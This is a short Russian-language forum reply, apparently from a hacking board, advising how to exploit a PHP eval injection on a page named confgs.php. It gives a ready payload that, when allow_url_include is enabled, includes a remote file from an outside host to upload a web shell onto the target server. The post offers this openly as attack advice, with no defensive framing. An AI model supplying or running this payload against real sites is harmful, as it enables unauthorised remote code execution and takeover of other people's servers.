Показать сообщение отдельно

  #11  
Старый 09.12.2009, 17:48
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

eval позволяет выполнять php-код, ls - никакого отношения к php не имеет. Вывод - нужно написать PHP-код, с помощью которого можно будет залить шелл.

Например, если после просмотра phpinfo() там будет allow_url_include = ON, то можно так залить шелл:

confgs.php?e=include('http://site/shell.txt');
 
Ответить с цитированием